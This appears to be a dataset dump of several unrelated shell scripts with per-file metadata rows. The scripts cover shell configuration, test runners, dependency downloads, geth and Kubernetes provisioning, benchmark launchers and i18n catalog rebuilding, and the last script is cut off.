export ENHANCD_HYPHEN_ARG="-" # Default: "-", If set, that behavior same act as original cd
export ENHANCD_HOME_ARG="" # Default: ""
export ENHANCD_HOOK_AFTER_CD="ls" # Default: ""
export ENHANCD_USE_FUZZY_MATCH=1 # Default: 1
source ~/.enhancd/init.sh
fi
# Overwrite Ctrl-R key map
[[ "$(uname -s)" = 'Linux' ]] && bind -x '"\C-r":peco-select-history-linux'
[[ "$(uname -s)" = 'Darwin' ]] && bind -x '"\C-r":peco-select-history-mac'
# NOTE(review): this condition is inverted — the direnv hook is installed
# only when `command -v direnv` FAILS (direnv absent); confirm intent.
if ! command -v direnv; then
eval "$(direnv hook bash)"
fi
# tabtab source for packages
# uninstall by removing these lines
[ -f ~/.config/tabtab/__tabtab.bash ] && . ~/.config/tabtab/__tabtab.bash || true
| true
|
f31db0ba217e68dd7918bfef48eecd69de512c5b
|
Shell
|
emilio93/ie521
|
/tarea1/scripts/runTests.sh
|
UTF-8
| 2,941
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/bash
# Runs the cache-simulator test matrix over every trace in ./data,
# echoing each ./cache invocation.  results.csv is (re)created with the
# CSV header; presumably ./cache appends rows to it — TODO confirm.
rm results.csv 2> /dev/null
touch results.csv
echo "Identificador,Cache Size(KB),Cache Associativity,Cache Block Size(bytes),Cache replacement policy,Miss penalty(cyc),Execution time(cycles),instructions,Memory accesses,Overall miss rate,Read miss rate,Average memory access time (cycles),Dirty evictions,Load misses,Store misses,Total misses,Load hits,Store hits,Total hits,CPI" > results.csv
for trace in ./data/*.gz; do
echo " "
echo "-------------- ${trace} --------------"
echo " "
## Sim 1: sweep cache size, pairing each size with a cycle multiplier.
echo " "
echo "-------------- SIM 1 --------------"
echo " "
declare -a tamanoCache=("16" "32" "128")
declare -a cycleMult=("1" "1.05" "1.15")
cacheBlockSize=16
missPenalty=5
cacheRP="LRU"
cacheAssoc=1
# A plain counter replaces the old /tmp/$$.tmp read/write round-trip,
# which forked three processes per iteration for no benefit, and the
# deprecated $[...] arithmetic syntax.
COUNTER=0
for i in "${tamanoCache[@]}"
do
echo ./cache -t ${i} -a ${cacheAssoc} -l ${cacheBlockSize} -mp ${missPenalty} -rp ${cacheRP} -f ${trace} -c ${cycleMult[$COUNTER]}
./cache -t ${i} -a ${cacheAssoc} -l ${cacheBlockSize} -mp ${missPenalty} -rp ${cacheRP} -f ${trace} -c ${cycleMult[$COUNTER]}
echo "----------------------------"
COUNTER=$((COUNTER + 1))
done
## Sim 2: sweep block size, pairing each size with a miss penalty.
echo " "
echo "-------------- SIM 2 --------------"
echo " "
declare -a tamanoBloque=("16" "32" "64")
declare -a missPenalty=(1 2 6)
cacheSize=16
cacheRP="LRU"
cacheAssoc=1
COUNTER=0
for i in "${tamanoBloque[@]}"
do
echo ./cache -t ${cacheSize} -a ${cacheAssoc} -l ${i} -mp ${missPenalty[$COUNTER]} -rp ${cacheRP} -f ${trace}
./cache -t ${cacheSize} -a ${cacheAssoc} -l ${i} -mp ${missPenalty[$COUNTER]} -rp ${cacheRP} -f ${trace}
echo "----------------------------"
COUNTER=$((COUNTER + 1))
done
## Sim 3: replacement policy x associativity grid, with per-assoc cycle
## multipliers.
echo " "
echo "-------------- SIM 3 --------------"
echo " "
declare -a cacheRP=("LRU" "NRU" "SRRIP" "random")
declare -a cacheAssoc=(2 4 8 16)
declare -a cycleMult=(1.04 1.06 1.08 1.16)
tamanoBloque=16
cacheSize=16
missPenalty=5
for i in "${cacheRP[@]}"
do
COUNTER=0
for j in "${cacheAssoc[@]}"
do
echo ./cache -t ${cacheSize} -a ${j} -l ${tamanoBloque} -mp ${missPenalty} -rp ${i} -f ${trace} -c ${cycleMult[$COUNTER]}
./cache -t ${cacheSize} -a ${j} -l ${tamanoBloque} -mp ${missPenalty} -rp ${i} -f ${trace} -c ${cycleMult[$COUNTER]}
echo "----------------------------"
COUNTER=$((COUNTER + 1))
done
done
done
| true
|
f3a35a674d32303c011d81e0ffda976cf19c1cc2
|
Shell
|
vedi/android-profile
|
/social-providers/android-profile-facebook/download_deps
|
UTF-8
| 1,164
| 2.953125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
set -e
# Fetches/links the jar dependencies for android-profile-facebook into
# ./libs next to this script.
# NOTE: ${BASH_SOURCE[0]} (used previously) is a bash-only variable and
# is empty under /bin/sh; $0 is the portable way to locate the script.
DIR=$( cd "$( dirname "$0" )" && pwd )
cd "$DIR"
if [ ! -d libs ];
then
mkdir libs
fi
# simple-fb: download the .aar and extract its classes.jar.
if [ ! -f libs/simple-fb-4.0.9.jar ];
then
curl -o simple-fb-4.0.9.aar https://dl.bintray.com/sromku/maven/com/sromku/simple-fb/4.0.9/simple-fb-4.0.9.aar
mkdir simple-fb
tar -xvf simple-fb-4.0.9.aar -C simple-fb
mv simple-fb/classes.jar libs/simple-fb-4.0.9.jar
rm -rf simple-fb
rm simple-fb-4.0.9.aar
fi
if [ ! -f libs/gson-1.7.2.jar ];
then
curl -o libs/gson-1.7.2.jar http://central.maven.org/maven2/com/google/code/gson/gson/1.7.2/gson-1.7.2.jar
fi
# Symlinks into sibling build outputs (-h tests for an existing symlink).
if [ ! -h libs/AndroidProfile.jar ];
then
ln -s ../../../build/AndroidProfile.jar libs/AndroidProfile.jar
fi
if [ ! -h libs/SoomlaAndroidCore.jar ];
then
ln -s ../../../SoomlaAndroidProfile/libs/SoomlaAndroidCore.jar libs/SoomlaAndroidCore.jar
fi
if [ ! -h libs/square-otto-1.3.2.jar ];
then
ln -s ../../../SoomlaAndroidProfile/libs/square-otto-1.3.2.jar libs/square-otto-1.3.2.jar
fi
if [ ! -d libs/facebook ];
then
curl -L -o libs/facebook.zip http://library.soom.la/fetch/android-profile-facebook/4.6.0?cf=dl_deps
unzip libs/facebook.zip -d libs/
rm libs/facebook.zip
fi
| true
|
a64bdee1e8a31e5a0729985b0ce5022cbfc05823
|
Shell
|
jrtkcoder/zephir
|
/.ci/run-tests.sh
|
UTF-8
| 910
| 3.5
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh
#
# This file is part of the Zephir.
#
# (c) Zephir Team <team@zephir-lang.com>
#
# For the full copyright and license information, please view the LICENSE
# file that was distributed with this source code.
# -e Exit immediately if a command exits with a non-zero status.
# -u Treat unset variables as an error when substituting.
set -eu
# ${CI+x} expands to "x" only when CI is set, so this guards against
# both "unset" and "not true" without tripping set -u.
if [ -z ${CI+x} ] || [ "$CI" != "true" ]; then
printf "This script is designed to run inside a CI container only.\nAborting.\n"
exit 1
fi
# Pick the PHPUnit suite matching the PHP version (vernum, e.g. 70125).
if [ "$(php-config --vernum)" -lt "70000" ]; then
test_suite="Extension_Php56"
elif [ "$(php-config --vernum)" -lt "70200" ]; then
test_suite="Extension_Php70"
else
test_suite="Extension_Php72"
fi
# Run the extension tests with the freshly built test.so loaded.
php \
-d extension=ext/modules/test.so \
vendor/bin/simple-phpunit \
--colors=always \
--bootstrap unit-tests/ext-bootstrap.php \
--testsuite ${test_suite}
php \
vendor/bin/simple-phpunit \
--colors=always \
--testsuite Zephir
| true
|
20b93e7021cdce63ba2a33903ae29d1506532e10
|
Shell
|
subutai-blueprints/blockchain-in-a-box
|
/files/start_geth
|
UTF-8
| 1,869
| 3.1875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
# Launches geth either on a private network (creating genesis file,
# datadir and a default account on first run) or on a public testnet,
# driven by NETWORK / NETWORK_ID from /etc/default/geth.
. /etc/default/geth
if [ "$NETWORK" = "private" ]; then
echo "Running Private Network"
if [ -n "$NETWORK_ID" ]; then
# Check if .ethereum exists
[ -d ~/.ethereum ] || mkdir ~/.ethereum
# Check if generis file has been generated
# NOTE(review): <<-EOF strips leading *tabs* only; the JSON body and the
# closing EOF must be tab-indented in the real file — confirm whitespace.
if [ ! -f ~/.ethereum/genesis.json ]; then
cat <<-EOF >~/.ethereum/genesis.json
{
"config": {
"chainId": $NETWORK_ID,
"homesteadBlock": 0,
"eip155Block": 0,
"eip158Block": 0
},
"difficulty": "0x400",
"gasLimit": "0x8000000",
"alloc": {}
}
EOF
fi
# Check if .ethereum/private exists
[ -d ~/.ethereum/private ] || mkdir ~/.ethereum/private
# Check if chain has been created
if [ ! -d ~/.ethereum/private/geth ]; then
echo "Create private blockchain"
geth --identity "$NETWORK" --datadir ~/.ethereum/$NETWORK init ~/.ethereum/genesis.json
fi
# Check if account exists
ACCOUNT_0=`geth --networkid $NETWORK_ID --datadir ~/.ethereum/$NETWORK account list 2>/dev/null`
if [ -z "$ACCOUNT_0" ]; then
echo "Creating new account"
geth --networkid $NETWORK_ID --datadir ~/.ethereum/$NETWORK account new --password ~/.ethereumpwd 2>/dev/null
fi
# Finally run geth with miner
echo "Firing up geth in private mode"
nice -n 10 geth --networkid $NETWORK_ID --datadir ~/.ethereum/$NETWORK --rpc --rpcport 8545 --rpcapi db,eth,net,web3,personal --verbosity 3 --mine --minerthreads 1
else
echo "Private network with no ID?"
exit 100
fi
else
echo "Firing up geth in testnet mode"
/usr/bin/geth -${NETWORK} --syncmode fast --rpc --rpcport 8545 --rpcapi db,eth,net,web3,personal
fi
# vim: ts=4 et nowrap autoindent
| true
|
e757f55068c44f3937cbc2240207989a915e4b45
|
Shell
|
btc-ag/revengtools
|
/external/idep/src/configure
|
UTF-8
| 2,429
| 3.625
| 4
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"Apache-2.0"
] |
permissive
|
#!/bin/sh
settings_gplusplus() {
  # g++ toolchain: compiler/linker settings later written to .config.mk.
  # The trailing space in CXXOUT/LDOUT keeps the flag and the output path
  # as two separate words on the command line.
  CXXFLAGS="-g "
  CXX="g++"
  CXXOUT="-o "
  LIBS=
  LDFLAGS=
  LDSUF=
  LDD="g++"
  LDOUT="-o "
}
debug_settings_gplusplus() {
  # Debug build for g++: compile and link with debug info only.
  LDFLAGS="-g"
  CXXFLAGS="-g"
}
settings_msvc() {
  # MSVC toolchain: cl.exe compiles, link.exe links.
  CXX="cl"
  CXXFLAGS="/nologo /EHsc"
  CXXOUT="/Fo"          # /Fo<file>: no space between flag and path
  LDD="link"
  LDFLAGS="/nologo"
  LDOUT="/out:"
  LIBS=
  LDSUF=".exe"          # Windows executables carry a .exe suffix
}
debug_settings_msvc() {
  # Debug build for MSVC: /Z7 embeds debug info into the objects;
  # the linker keeps it with /debug and disables fixed base addresses.
  CXXFLAGS="$CXXFLAGS /Z7"
  LDFLAGS="/fixed:no /debug"
}
##############################################################
msg_chkfor() {
# Print a "checking for <thing> ... " progress prefix without a newline.
# printf replaces `echo -n`: POSIX echo has no -n option, so under
# #!/bin/sh some shells would print a literal "-n".
printf 'checking for %s ... ' "$1"
}
check_system() {
# Detect the host OS via uname and select the matching compiler
# settings: uname values ending in "NT" get MSVC, all others g++.
sys=$(uname)
msg_chkfor "compiler"
case "$sys" in
*NT)
echo "ok. using msvc."
settings_msvc
;;
*)
echo "ok. using g++."
settings_gplusplus
;;
esac
}
# Smoke-test the selected C++ toolchain by compiling a hello-world.
# Relies on globals set by settings_*: $CXX, $CXXFLAGS, $CXXOUT.
# $CXXOUT ends in a space ("-o ") or is "/Fo", so $CXXOUT/dev/null
# expands to "-o /dev/null" or "/Fo/dev/null" respectively.
# fd 3 (compiler stderr target) is opened by the top-level
# `exec 3> .config.log`; calling this function before that fails.
check_cplusplus() {
cat << EOF > tmp.c
#include <iostream>
int main() {
std::cerr << "hello world\n";
return 0;
}
EOF
msg_chkfor "cplusplus"
if ${CXX} ${CXXFLAGS} -c tmp.c $CXXOUT/dev/null 2>&3
then
echo "ok."
else
echo "no."
echo "error: can't compile cplusplus code."
exit 1
fi
}
#############################################################################
# Parse command-line arguments.
while [ $# -gt 0 ]
do
case $1 in
--help)
cat <<EOF
Options for configure:
 --debug enable debug
 --with-<compiler> gcc,mscv
 --help shows usage of the configure script
EOF
exit 0
;;
--debug)
SET_DEBUG=1
;;
esac
shift
done
##############################################################
# fd 3: configure log; fd 4: generated make fragment (.config.mk).
exec 3> .config.log
exec 4> .config.mk
check_system
# POSIX test(1) uses '=' for string equality; the previous '==' is a
# bashism that errors out under dash and other /bin/sh implementations,
# silently breaking --debug.
if [ "$SET_DEBUG" = 1 ]; then
case $CXX in
"g++")
debug_settings_gplusplus
;;
"cl")
debug_settings_msvc
;;
esac
fi
echo "# idep's .config.mk" >&4
echo "#_______________________" >&4
echo "VERSION=\\\"1.0\\\"" >&4
# NOTE(review): $prefix is never assigned in this script, so this writes
# "prefix=" unless the caller exported it — confirm intent.
echo "prefix=$prefix" >&4
echo "CXX=${CXX}" >&4
echo "CXXOUT=${CXXOUT}" >&4
echo "CXXFLAGS=${CXXFLAGS}" >&4
echo "LDD=${LDD}" >&4
echo "LDFLAGS=${LDFLAGS}" >&4
echo "LDOUT=${LDOUT}" >&4
echo "LIBS=${LIBS}" >&4
echo "LDSUF=${LDSUF}" >&4
echo "#_______________________" >&4
echo "" >&4
check_cplusplus
echo "#_______________________" >&4
echo "" >&4
rm -fr tmp.c
# vim:ft=sh
| true
|
fdf785b2bd7ce01ca257dbd46374f00ecee9fdf0
|
Shell
|
thelazyindian/packages_apps_Margarita
|
/push.sh
|
UTF-8
| 1,063
| 2.921875
| 3
|
[] |
no_license
|
#!/bin/bash
# Publishes the CI-built debug APK to Slack and Telegram along with a
# changelog and a build-status message (Travis environment variables).
AUTHOR_NAME="$(git log -1 $TRAVIS_COMMIT --pretty="%aN")"
FILENAME=Margarita-debug-$(date +"%Y%m%d-%H:%M").apk
COMMIT=$(git log -1 $TRAVIS_COMMIT --pretty="%h")
# Markdown message linking the Travis build and the commit.
MSG="Build [#${TRAVIS_BUILD_NUMBER}](https://travis-ci.org/${TRAVIS_REPO_SLUG}/builds/${TRAVIS_BUILD_ID}) ([${COMMIT}](https://github.com/${TRAVIS_REPO_SLUG}/commit/${TRAVIS_COMMIT})) of ${TRAVIS_REPO_SLUG}@${TRAVIS_BRANCH} by ${AUTHOR_NAME} passed."
mv app/build/outputs/apk/debug/app-debug.apk ${FILENAME}
# NOTE(review): the backticks below sit inside double quotes, so bash
# executes the *output* of `git log` as a command rather than embedding
# literal markdown backticks — presumably unintended; confirm.
CHANGELOG="*Changelog:*
`$(git log ${TRAVIS_COMMIT_RANGE} --pretty=format:'%h: %s by %aN%n')`"
curl https://slack.com/api/files.upload -F token=${TOKEN} -F channels=#margarita -F title=${FILENAME} -F filename=${FILENAME} -F file=@${FILENAME}
curl https://api.telegram.org/bot${BOT_TOKEN}/sendDocument -F chat_id=${CHAT_ID} -F document=@${FILENAME}
curl https://api.telegram.org/bot${BOT_TOKEN}/sendMessage -d "chat_id=${CHAT_ID}&text=${CHANGELOG}&parse_mode=markdown"
curl https://api.telegram.org/bot${BOT_TOKEN}/sendMessage -d "chat_id=${CHAT_ID}&text=${MSG}&parse_mode=markdown"
| true
|
7dc3866b5f4ccd71e81647bb3ee38041d29544cc
|
Shell
|
RyanLucchese/git-svn-scripts
|
/install.sh
|
UTF-8
| 463
| 3.484375
| 3
|
[
"ISC"
] |
permissive
|
#!/bin/bash
# Installs the git-svn-* helper scripts into $HOME/bin.
# All $HOME expansions are quoted so the script survives a home
# directory containing spaces (the previous version did not quote them).
# if $HOME/bin doesn't exist, create it
if [ ! -d "$HOME/bin" ]; then
mkdir "$HOME/bin"
# in many cases the default ~/.profile will add $HOME/bin to path if it exists
if [ -e "$HOME/.profile" ]; then
. "$HOME/.profile"
fi
fi
# make sure $HOME/bin is in $PATH, otherwise this install script will not work
if [[ ":$PATH:" != *":$HOME/bin:"* ]]; then
echo "$HOME/bin is not in \$PATH! Please set \$PATH appropriately"
exit 1
fi
cp git-svn-* "$HOME/bin"
| true
|
9d46d5543a8859b023fd201909215c0b97915d89
|
Shell
|
guntukukamal/cloud-ops-AWS-AZURE
|
/aws/terraform/k8s/cloud-init/master.sh
|
UTF-8
| 1,017
| 3.125
| 3
|
[
"Apache-2.0"
] |
permissive
|
# Author: SAVITHRU LOKANATH
# Contact: SAVITHRU AT ICLOUD DOT COM
# Copyright (c) 2018 Juniper Networks, Inc. All rights reserved
#!/bin/sh
# NOTE(review): the shebang above is not on line 1, so it is inert; the
# interpreter is whatever cloud-init/terraform invokes this with.
# Set SSH password, keyless SSH, stat hosts & install base packages
# Positional args: $1 = root password, $2 = master host, $3 = node host.
set -eux
# The unquoted heredoc below runs as root and has $1/$2/$3 expanded by
# the *outer* shell before being fed to the root bash session.
# NOTE(review): the outer heredoc ends at the first bare "EOF" (the one
# after "$3"), so the inner `cat << 'EOF'` heredoc is terminated only by
# end-of-input inside the root shell, and the trailing ansible-playbook
# line runs in the outer (non-root) shell — confirm this layering is
# intended.
sudo -u root bash << EOF
sed -i -e 's/PermitRootLogin prohibit-password/PermitRootLogin yes/g' -e 's/PasswordAuthentication no/PasswordAuthentication yes/g' /etc/ssh/sshd_config
service sshd restart
echo root:$1 | chpasswd
apt-get update -y && apt-get install python git wget sshpass ansible -y
cd /root && git clone https://github.com/savithruml/ansible-labs
ssh-keygen -t rsa -C "" -P "" -f "/root/.ssh/id_rsa" -q
sshpass -p $1 ssh-copy-id -o StrictHostKeyChecking=no -i /root/.ssh/id_rsa.pub root@$2
sshpass -p $1 ssh-copy-id -o StrictHostKeyChecking=no -i /root/.ssh/id_rsa.pub root@$3
cd /root/ansible-labs/k8s
echo > /root/ansible-labs/k8s/hosts
cat << 'EOF' >> /root/ansible-labs/k8s/hosts
[masters]
$2
[nodes]
$3
EOF
ansible-playbook -i /root/ansible-labs/k8s/hosts /root/ansible-labs/k8s/site.yml
| true
|
eb84cfa9fe0ca55303b852f5f3639ea1d2283208
|
Shell
|
SerenityOS/serenity
|
/Userland/Shell/Tests/control-structure-as-command.sh
|
UTF-8
| 1,284
| 3.359375
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/Shell
# SerenityOS Shell test (not POSIX sh): uses Serenity's `for ... { }` /
# `if cond { }` block syntax.  Verifies that control structures compose
# with `&&` and pipes like ordinary commands.
source $(dirname "$0")/test-commons.inc
setopt --verbose
rm -rf /tmp/shell-test 2> /dev/null
mkdir -p /tmp/shell-test
pushd /tmp/shell-test
touch a b c
# Can we do logical stuff with control structures?
ls && for $(seq 1) { echo yes > listing }
if not test "$(cat listing)" = "yes" { fail for cannot appear as second part of '&&' }
rm listing
# FIXME: These should work!
# for $(seq 1) { echo yes > listing } && echo HELLO!
# if not test "$(cat listing)" = "yes" { echo for cannot appear as first part of '&&' }
# rm listing
# Can we pipe things into and from control structures?
# ls | if true { cat > listing }
# if not test "$(cat listing)" = "a b c" { fail if cannot be correctly redirected to }
# rm listing
# ls | for $(seq 1) { cat > listing }
# if not test "$(cat listing)" = "a b c" { fail for cannot be correctly redirected to }
# rm listing
for $(seq 4) { echo $it } | cat > listing
if not test "$(cat listing)" = "1 2 3 4" { fail for cannot be correctly redirected from }
rm listing
if true { echo TRUE! } | cat > listing
if not test "$(cat listing)" = "TRUE!" { fail if cannot be correctly redirected from }
rm listing
popd
rm -rf /tmp/shell-test
echo PASS
| true
|
f57ecf1f4f535b3a99612e2bc889a0e72a47ace3
|
Shell
|
shishir90/node-microservice-mongo-docker
|
/docker_setup/create-image.sh
|
UTF-8
| 332
| 2.671875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Rebuilds the users-service image inside the docker-machine "manager1"
# environment, tags it as shishir/<service>:latest and pushes it.
eval `docker-machine env manager1`
cd ..
cd users-service
# NOTE(review): "users-service" contains no '/', so cut outputs the whole
# line and this is effectively SERVICE=users-service; likely a leftover
# from a path-based loop — confirm.
SERVICE=$(echo users-service | cut -d'/' -f 2)
docker rmi shishir/$SERVICE
sh ./create-image.sh
IMAGE_ID=$(docker images -q $SERVICE)
docker tag $IMAGE_ID shishir/$SERVICE:latest
docker push shishir/$SERVICE:latest
docker rmi $SERVICE
cd ..
|
58d574010fc45c6318bf0eb0fbaf4d641037f64c
|
Shell
|
jpbempel/spring-petclinic
|
/scripts/start.sh
|
UTF-8
| 2,117
| 2.6875
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
#!/bin/bash
# Starts the Spring PetClinic benchmark jar with an optional profiler
# ($1: ap | jfr | dd | dd-profileonly) and JDK flavor ($2: jdk8 | jdk11
# | jdk15) selecting the matching GC logging syntax.
OPTIONS=""
# async-profiler: wall-clock sampling to a collapsed-stacks file.
if [ "$1" == "ap" ];
then
OPTIONS="-agentpath:../../ap/build/libasyncProfiler.so=start,event=wall,collapsed,file=petclinic_collapsed.txt"
fi
# Java Flight Recorder profile dumped on exit.
if [ "$1" == "jfr" ];
then
OPTIONS="-XX:StartFlightRecording=filename=petclinic-benchmark-profile.jfr,dumponexit=true,settings=profile"
fi
# Datadog agent with tracing + profiling enabled.
if [ "$1" == "dd" ];
then
OPT_TRACER="-javaagent:../../dd-java-agent-0.63.0-SNAPSHOT.jar -Ddd.trace.enabled=true"
OPT_SYNTH="-DvetsSyntheticCpu=0 -DvetsSyntheticSleep=0 -DvetsSyntheticSpans=0 -DvetsSyntheticSpanSleep=0"
OPT_PROFILER="-Ddd.profiling.enabled=true -Ddd.profiling.api-key-file=../../profiling-api-key"
OPT_LOGGING="-Ddatadog.slf4j.simpleLogger.defaultLogLevel=info"
OPTIONS="$OPT_TRACER $OPT_PROFILER $OPT_LOGGING $OPT_SYNTH"
fi
# Datadog agent with profiling only (tracing disabled).
if [ "$1" == "dd-profileonly" ];
then
OPT_TRACER="-javaagent:../../dd-java-agent-0.63.0-SNAPSHOT.jar -Ddd.trace.enabled=false"
OPT_SYNTH="-DvetsSyntheticCpu=0 -DvetsSyntheticSleep=0 -DvetsSyntheticSpans=0 -DvetsSyntheticSpanSleep=0"
OPT_PROFILER="-Ddd.profiling.enabled=true -Ddd.profiling.api-key-file=../../profiling-api-key"
OPT_LOGGING="-Ddatadog.slf4j.simpleLogger.defaultLogLevel=info"
OPTIONS="$OPT_TRACER $OPT_PROFILER $OPT_LOGGING $OPT_SYNTH"
fi
# jdk flavors
# NOTE(review): GC_FILENAME is never assigned in this script, so the gc
# log filename is empty unless the caller exports it — confirm.
if [ "$2" == "jdk8" ];
then
export JAVA_HOME=../../jdk/jdk8u275-b01
GC_OPTIONS="-Xloggc:$GC_FILENAME -XX:+PrintGCDetails"
fi
if [ "$2" == "jdk11" ];
then
export JAVA_HOME=../../jdk/jdk-11.0.9+11
GC_OPTIONS="-Xlog:gc*:file=$GC_FILENAME"
fi
if [ "$2" == "jdk15" ];
then
export JAVA_HOME=../../jdk/jdk-15.0.1+9
GC_OPTIONS="-Xlog:gc*:file=$GC_FILENAME"
fi
export PATH=$PATH:$JAVA_HOME/bin
# Remote JMX on 18000, 200 worker threads; stdout goes to out_petclinic.txt.
$JAVA_HOME/bin/java ${OPTIONS} \
-Dcom.sun.management.jmxremote.port=18000 -Dcom.sun.management.jmxremote.rmi.port=18000 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Djava.rmi.server.hostname=127.0.0.1 \
-DnbThreads=200 \
-Ddd.service.name=PetClinic-Benchmark \
$GC_OPTIONS \
-jar ../target/spring-petclinic-2.2.0.BUILD-SNAPSHOT.jar > out_petclinic.txt
| true
|
71605aad106808b9e90174d9957d88f4e235e643
|
Shell
|
swstechdev/storj
|
/freenas/overlay/root/bin/storj-pwreset
|
UTF-8
| 889
| 3.859375
| 4
|
[] |
no_license
|
#!/bin/sh
# reset login for StorjAdmin
# Interactively blanks the username/password stored in storjconfig.json
# (a backup is kept as storjconfig.json.old via sed -i .old).
storj_pw_reset () {
local cfg="/usr/local/www/storjadmin/data/storjconfig.json"
# Pull the current credentials out of the JSON (4th "-delimited field).
local U=$(cat "${cfg}" | grep username | cut -d '"' -f 4)
local P=$(cat "${cfg}" | grep password | cut -d '"' -f 4)
# Yes/no prompt; sets ANSWER=Y/N, 'q' quits immediately.
prompt_yes () { # prompt [YES|no]
while true; do
read -r -p "${1} [Y/n]: " REPLY
case $REPLY in
[qQ]) echo ; echo "Goodbye!"; exit ;;
[yY]|[yY][eE][sS]|"") echo ; ANSWER=Y ; return ;;
[nN]|[nN][oO]) echo ; ANSWER=N ; return 1 ;;
*) printf " \033[31m %s \n\033[0m" " ! Invalid Input Received"
esac
done
}
echo "Your User Name is: "${U}""
prompt_yes "You are about to reset your login!"
if [ "${ANSWER}" = "Y" ]; then
# NOTE(review): 'ee' in the failure branch is not a standard utility and
# is not defined here — possibly a typo (editor? echo?); confirm.
sed -i .old -e "s/"${U}"/""/; s/"${P}"/""/" "${cfg}" && echo "Login Reset" || ee "${cfg}"
exit
else
echo "Goodbye"
fi
}
storj_pw_reset
| true
|
fc3e54d242fe20d422ac4f089fe93f3336a68a1f
|
Shell
|
collective/collective.generic.skel
|
/src/collective/generic/skel/addon/tmpl/+namespace++ndot++nested_namespace++nsdot++project_name+/src/+namespace+/+nested_namespace+/+project_name+/rebuild_i18n.sh_tmpl
|
UTF-8
| 621
| 3.375
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/usr/bin/env bash
# Skeleton template (note the _tmpl suffix): ${pdn} and the escaped \$
# sequences are substituted when the skeleton is rendered, not by bash.
# The rendered script rebuilds the i18n .pot/.po catalogs with i18ndude.
PRODUCTNAME='${pdn}'
I18NDOMAIN=\$PRODUCTNAME
CWD=\$(dirname $0)
cd \${CWD}
# Prefer a buildout-relative bin/ directory on PATH so the project's own
# i18ndude is found first.
for d in ../../../.. ../..;do
if [[ -d "\${d}/bin" ]];then
export PATH="\${d}/bin:\${PATH}"
fi
done
i18ndude=\$(which i18ndude)
echo "Using \${i18ndude} in \${CWD}"
# Synchronise the .pot with the templates.
\${i18ndude} rebuild-pot --pot locales/\${PRODUCTNAME}.pot --merge locales/\${PRODUCTNAME}-manual.pot --create \${I18NDOMAIN} .
# Synchronise the resulting .pot with the .po files
for po in locales/*/LC_MESSAGES/\${PRODUCTNAME}.po;do
\${i18ndude} sync --pot locales/\${PRODUCTNAME}.pot \$po
done
| true
|
74ac655d432d291d776c6f7eb1ef21f33559d7f0
|
Shell
|
SUSE/brain-tests-release
|
/packages/mariadb-client/packaging
|
UTF-8
| 189
| 2.875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# BOSH packaging script: installs the MariaDB client via zypper and
# copies the mysql binary into this package's bin directory.
set -e -x
BIN_DIR=${BOSH_INSTALL_TARGET}/bin
mkdir -p ${BIN_DIR}
# Install the mysql client into the package
zypper install -y mariadb-client
cp /usr/bin/mysql "${BIN_DIR}"
| true
|
e0fa28274cf01132a29abe974652ca6c4a9aa81e
|
Shell
|
andywyatte17/random_stuff
|
/zim/getoeb.sh
|
UTF-8
| 188
| 2.515625
| 3
|
[] |
no_license
|
#!/bin/bash
# Download the Open English Bible (2016.1) pages — the index plus books
# b001..b069 — into ./openenglishbible, including page requisites.
mkdir openenglishbible
cd openenglishbible
for page in index b{001..069}; do
  wget --page-requisites "http://openenglishbible.org/oeb/2016.1/read/${page}.html"
done
cd ..
| true
|
c1cbec71771090ee46bd7e24a1f86c103596fb0a
|
Shell
|
Matt3697/test
|
/mantra.sh
|
UTF-8
| 272
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
# Prints $1 framed in a box of asterisks, repeating the line $2 times.
# Usage: mantra.sh <string> <count>
clear
echo
# Message length via ${#1} instead of `echo -n $1 | wc -c`: no forks,
# and the unquoted $1 in the old pipeline collapsed whitespace, so the
# border could be narrower than the displayed "* $1 *" lines.
X=${#1}
Y=4
# Border width: message length + 2 spaces + 2 asterisks.
R=$((X + Y))
for num in $(seq $R); do
printf "*"
done
echo
for num in $(seq $2); do
echo "* $1 *"
done
for num in $(seq $R); do
printf "*"
done
echo
| true
|
30e4273a0bf231a67b39981876d03e5decfda1d6
|
Shell
|
zoni/dotfiles
|
/src/.zsh/25-completions.zsh
|
UTF-8
| 1,238
| 2.671875
| 3
|
[
"LicenseRef-scancode-public-domain"
] |
permissive
|
## See also https://thevaluable.dev/zsh-completion-guide-examples/
#
## Make completion matches case-insensitive
##zstyle ':completion:*' matcher-list 'm:{a-zA-Z}={A-Za-z}'
#
## Make completion matches case-insensitive and match on partial words
#zstyle ':completion:*' matcher-list '' 'm:{a-zA-Z}={A-Za-z}' 'r:|[._-]=* r:|=*' 'l:|=* r:|=*'
#
## Complete non-ambiguous entries automatically
#zstyle ':completion:*' insert-unambiguous true
#
## Enable a menu for completions
#zstyle ':completion:*' menu yes select
#
# Make menu completion of files use the same colors as ls (set via $LS_COLORS)
# (the zsh (s.:.) expansion flag splits $LS_COLORS on ':')
autoload zsh/complist
zstyle ':completion:*:default' list-colors ${(s.:.)LS_COLORS}
# Group completions by source
zstyle ':completion:*:*:*:*:descriptions' format '%F{blue}-- %d --%f'
zstyle ':completion:*' group-name ''
# Configure the `ps` invocation used to complete process lists (for example to
# complete the kill command)
zstyle ':completion:*:*:*:*:processes' command "ps x -o pid,user,comm,cmd"
# https://github.com/marlonrichert/zsh-autocomplete/
zstyle ':autocomplete:*complete*:*' insert-unambiguous yes
zstyle ':autocomplete:*' add-space \
executables reserved-words
zstyle ':autocomplete:*' delay 0.35  # seconds (float)
|
28dcb45d554671aca72e9d901663880eb7f66578
|
Shell
|
sth144/.workflow
|
/src/utils/shared/video/img_to_video_sec.sh
|
UTF-8
| 792
| 4.125
| 4
|
[] |
no_license
|
#!/bin/bash
# Turns a single image into a fixed-duration mp4 by looping it through
# FFmpeg.  Usage: img_to_video_sec.sh <image-path> <duration-seconds>
# check if file path and duration have been provided
if [ $# -ne 2 ]; then
echo "Please provide input image file path and duration as arguments"
exit 1
fi
# set input file path and duration in seconds
input_file="$1"
duration="$2"
